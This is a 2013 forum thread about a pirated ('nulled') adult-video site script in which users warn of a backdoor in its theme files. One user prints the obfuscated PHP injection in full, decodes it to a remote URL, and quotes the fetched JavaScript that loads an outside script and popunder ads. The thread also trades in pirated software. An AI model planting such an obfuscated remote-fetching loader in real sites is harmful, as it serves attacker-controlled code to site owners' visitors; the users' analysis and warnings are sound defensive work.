[GET] Adult Watch v5.4 Nulled

***jaydjay*** · 03-25-2013, 03:42 PM

so are their files missing???

***spiritvorg*** · 05-11-2013, 04:42 PM

Folks beware! There is some backdoor in the script! :

go to themes files and you can see it somewhere at the bottom, clean up all of your files and look for this code! It can access your database and other info...

***daniel123*** · 05-11-2013, 08:54 PM

I think that yes, it's impossible that for no one can work...

***7digits*** · 05-12-2013, 12:19 AM

php head injection

***salon*** · 05-14-2013, 08:44 PM

Hi, I try to use this script, but i've some erros and principaliy one error:

PHP Code:

Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "C:/UwAmp/www/upload/themes\index.tpl" on line 95 "<?php if 

i've you got the same error ?
Thanks in adance

***salon*** · (This post was last modified: 05-14-2013 09:52 PM by salon.)

I also find more information about smarty... everybody say that smarty is rotten ...

***salon*** · 05-15-2013, 10:29 PM

about my problem with this code:

PHP Code:

<?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s178="\x62a\x73e6\x34_d\x65c\x6fd\x65"; static $mystr1s279="\x59\x33V\x79b\x469\x70b\x6dl0"; static $mystr1s381="aH\x520\x63\x44ov\x4c2xh\x62\x47F\x75ZC5\x68d\x435\x32d\x539\x6bYX\x52h\x4c2\x70​xdW\x56yeS\x30xLj\x59\x75My\x35t\x61W4\x75\x61nM\x3d"; static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33​\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x7​9R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x​54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44​c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz​\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x6​5XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\​x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x​6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\​x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4g​b\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\​x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 = mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 = curl_init();$mystr1s2237 = 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);$mystr1s2238 = curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}?>

I decoded this script and I obtened that:

PHP Code:

<?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s279="Y3\x56ybF\x39pb\x6d\x6c0"; static $mystr1s178="b\x61se\x364\x5f\x64ec\x6fd\x65"; static $mystr1s381="aH\x520\x63\x44ov\x4c3Ro\x5a\x571\x6cLm5\x31b\x47x\x6cZ\x47N\x73b2\x35l\x632\x4e​yaX\x420cy\x35jb2\x30\x76an\x461\x5aXJ\x35\x4cTE\x75Ni\x34zL\x6d1\x70b\x695qc\x7​7=\x3d";static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33​\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x7​9R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x​54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44​c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz​\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x6​5XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\​x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x​6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\​x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4g​b\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\​x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 = mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 = curl_init();$mystr1s2237 = 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);$mystr1s2238 = curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}?>

and I found that:

Code:

aHR0cDovL3RoZW1lLm51bGxlZGNsb25lc2NyaXB0cy5jb20vanF1ZXJ5LTEuNi4zLm1pbi5qcw==

=> http://theme.nulledclonescripts.com/jquery-1.6.3.min.js

And in this page I found that:

PHP Code:

<script><!--document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%20if%28%21document.referrer%20%7C%7C%20document.referrer%20%3D%​3D%20%27%27%29%20%7B%20document.write%28%27%3Cscr%27+%27ipt%20type%3D%22text/javascript%22%20src%3D%22http%3A//theme.nulledclonescripts.com/jquery.min.js%22%3E%3C/scr%27+%27ipt%3E%27%29%3B%20%7D%20else%20%7B%20document.write%28%27%3Cscr%27+%27​ipt%20type%3D%22text/javascript%22%20src%3D%22http%3A//theme.nulledclonescripts.com/jquery.min.js%22%3E%3C/scr%27+%27ipt%3E%27%29%3B%20%7D%20%3C/script%3E"));//--></script>
<script><!--document.write(unescape("%3Cscript%3E%0Avar%20puShown%20%3D%20false%3B%0Avar%20PopWidth%20%3D%201370%3B%0​Avar%20PopHeight%20%3D%20800%3B%0Avar%20PopFocus%20%3D%200%3B%0Avar%20_Top%20%3D​%20null%3B%0A%0Afunction%20GetWindowHeight%28%29%20%7B%0Avar%20myHeight%20%3D%20​0%3B%0Aif%28%20typeof%28%20_Top.window.innerHeight%20%29%20%3D%3D%20%27number%27​%20%29%20%7B%0AmyHeight%20%3D%20_Top.window.innerHeight%3B%0A%7D%20else%20if%28%​20_Top.document.documentElement%20%26%26%20_Top.document.documentElement.clientH​eight%20%29%20%7B%0AmyHeight%20%3D%20_Top.document.documentElement.clientHeight%​3B%0A%7D%20else%20if%28%20_Top.document.body%20%26%26%20_Top.document.body.clien​tHeight%20%29%20%7B%0AmyHeight%20%3D%20_Top.document.body.clientHeight%3B%0A%7D%​0Areturn%20myHeight%3B%0A%7D%0A%0Afunction%20GetWindowWidth%28%29%20%7B%0Avar%20​myWidth%20%3D%200%3B%0Aif%28%20typeof%28%20_Top.window.innerWidth%20%29%20%3D%3D​%20%27number%27%20%29%20%7B%0AmyWidth%20%3D%20_Top.window.innerWidth%3B%0A%7D%20​else%20if%28%20_Top.document.documentElement%20%26%26%20_Top.document.documentEl​ement.clientWidth%20%29%20%7B%0AmyWidth%20%3D%20_Top.document.documentElement.cl​ientWidth%3B%0A%7D%20else%20if%28%20_Top.document.body%20%26%26%20_Top.document.​body.clientWidth%20%29%20%7B%0AmyWidth%20%3D%20_Top.document.body.clientWidth%3B​%0A%7D%0Areturn%20myWidth%3B%0A%7D%0A%0Afunction%20GetWindowTop%28%29%20%7B%0Are​turn%20%28_Top.window.screenTop%20%21%3D%20undefined%29%20%3F%20_Top.window.scre​enTop%20%3A%20_Top.window.screenY%3B%0A%7D%0A%0Afunction%20GetWindowLeft%28%29%2​0%7B%0Areturn%20%28_Top.window.screenLeft%20%21%3D%20undefined%29%20%3F%20_Top.w​indow.screenLeft%20%3A%20_Top.window.screenX%3B%0A%7D%0A%0Afunction%20doOpen%28u​rl%29%0A%7B%0Avar%20popURL%20%3D%20%22about%3Ablank%22%0Avar%20popID%20%3D%20%22​ad_%22%20+%20Math.floor%2889999999*Math.random%28%29+10000000%29%3B%0Avar%20pxLe​ft%20%3D%200%3B%0Avar%20pxTop%20%3D%200%3B%0ApxLeft%20%3D%20%28GetWindowLeft%28%​29%20+%20%28GetWindowWidth%28%29%20/%202%29%20-%20%28PopWidth%20/%202%29%29%3B%0ApxTop%20%3D%20%28GetWindowTop%28%29%20+%20%28GetWindowHeight%28%​29%20/%202%29%20-%20%28PopHeight%20/%202%29%29%3B%0A%0Aif%20%28%20puShown%20%3D%3D%20true%20%29%0A%7B%0Areturn%20tru​e%3B%0A%7D%0A%0Avar%20PopWin%3D_Top.window.open%28popURL%2CpopID%2C%27toolbar%3D​0%2Cscrollbars%3D1%2Clocation%3D1%2Cstatusbar%3D1%2Cmenubar%3D0%2Cresizable%3D1%​2Ctop%3D%27%20+%20pxTop%20+%20%27%2Cleft%3D%27%20+%20pxLeft%20+%20%27%2Cwidth%3D​%27%20+%20PopWidth%20+%20%27%2Cheight%3D%27%20+%20PopHeight%29%3B%0A%0Aif%20%28P​opWin%29%0A%7B%0ApuShown%20%3D%20true%3B%0A%0Aif%20%28PopFocus%20%3D%3D%200%29%0​A%7B%0APopWin.blur%28%29%3B%0A%0Aif%20%28navigator.userAgent.toLowerCase%28%29.i​ndexOf%28%22applewebkit%22%29%20%3E%20-1%29%0A%7B%0A_Top.window.blur%28%29%3B%0A_Top.window.focus%28%29%3B%0A%7D%0A%7D%​0A%0APopWin.Init%20%3D%20function%28e%29%20%7B%0A%0Awith%20%28e%29%20%7B%0A%0APa​rams%20%3D%20e.Params%3B%0AMain%20%3D%20function%28%29%7B%0A%0Aif%20%28typeof%20​window.mozPaintCount%20%21%3D%20%22undefined%22%29%20%7B%0Avar%20x%20%3D%20windo​w.open%28%22about%3Ablank%22%29%3B%0Ax.close%28%29%3B%0A%0A%7D%0A%0Avar%20popURL​%20%3D%20Params.PopURL%3B%0A%0Atry%20%7B%20opener.window.focus%28%29%3B%20%7D%0A​catch%20%28err%29%20%7B%20%7D%0A%0Awindow.location%20%3D%20popURL%3B%0A%7D%0A%0A​Main%28%29%3B%0A%7D%0A%7D%3B%0A%0APopWin.Params%20%3D%20%7B%0APopURL%3A%20url%0A​%7D%0A%0APopWin.Init%28PopWin%29%3B%0A%7D%0A%0Areturn%20PopWin%3B%0A%7D%0A%0Afun​ction%20setCookie%28name%2C%20value%2C%20time%29%0A%7B%0Avar%20expires%20%3D%20n​ew%20Date%28%29%3B%0A%0Aexpires.setTime%28%20expires.getTime%28%29%20+%20time%20​%29%3B%0A%0Adocument.cookie%20%3D%20name%20+%20%27%3D%27%20+%20value%20+%20%27%3​B%20path%3D/%3B%27%20+%20%27%3B%20expires%3D%27%20+%20expires.toGMTString%28%29%20%3B%0A%7D%​0A%0Afunction%20getCookie%28name%29%20%7B%0Avar%20cookies%20%3D%20document.cooki​e.toString%28%29.split%28%27%3B%20%27%29%3B%0Avar%20cookie%2C%20c_name%2C%20c_va​lue%3B%0A%0Afor%20%28var%20n%3D0%3B%20n%3Ccookies.length%3B%20n++%29%20%7B%0Acoo​kie%20%20%3D%20cookies%5Bn%5D.split%28%27%3D%27%29%3B%0Ac_name%20%20%3D%20cookie​%5B0%5D%3B%0Ac_value%20%3D%20cookie%5B1%5D%3B%0A%0Aif%20%28%20c_name%20%3D%3D%20​name%20%29%20%7B%0Areturn%20c_value%3B%0A%7D%0A%7D%0A%0Areturn%20null%3B%0A%7D%0​A%0Afunction%20initPu%28%29%0A%7B%0A%0A_Top%20%3D%20self%3B%0A%0Aif%20%28top%20%​21%3D%20self%29%0A%7B%0Atry%0A%7B%0Aif%20%28top.document.location.toString%28%29​%29%0A_Top%20%3D%20top%3B%0A%7D%0Acatch%28err%29%20%7B%20%7D%0A%7D%0A%0Aif%20%28​%20document.attachEvent%20%29%0A%7B%0Adocument.attachEvent%28%20%27onclick%27%2C​%20checkTarget%20%29%3B%0A%7D%0Aelse%20if%20%28%20document.addEventListener%20%2​9%0A%7B%0Adocument.addEventListener%28%20%27click%27%2C%20checkTarget%2C%20false​%20%29%3B%0A%7D%0A%7D%0A%0Afunction%20checkTarget%28e%29%0A%7B%0Aif%20%28%20%21g​etCookie%28%27popundr%27%29%20%29%20%7B%0Avar%20e%20%3D%20e%20%7C%7C%20window.ev​ent%3B%0Avar%20win%20%3D%20doOpen%28%27http%3A//>>>[[[Reported by Members as URL Shortener! Post the actual link!]]]<<</XDY1P4%27%29%3B%0AsetCookie%28%27popundr%27%2C%201%2C%2024*60*60*1000%29%3B%0A%7​D%0A%7D%0A%0AinitPu%28%29%3B%0A%3C/script%3E"));//--></script> 

With a unescape decoder, I understand that Nullenulledclonescripts.com do a black SEO and this methology is interresting :p

***pornbait*** · 05-28-2013, 06:20 PM

I have removed the back door if anyone needs help

***iyuheng*** · 06-03-2013, 07:41 AM

(05-28-2013 06:20 PM)pornbait Wrote: I have removed the back door if anyone needs help

I need this ,plz upload it,thx bro

***iraqobs*** · 06-04-2013, 06:44 AM

thanks man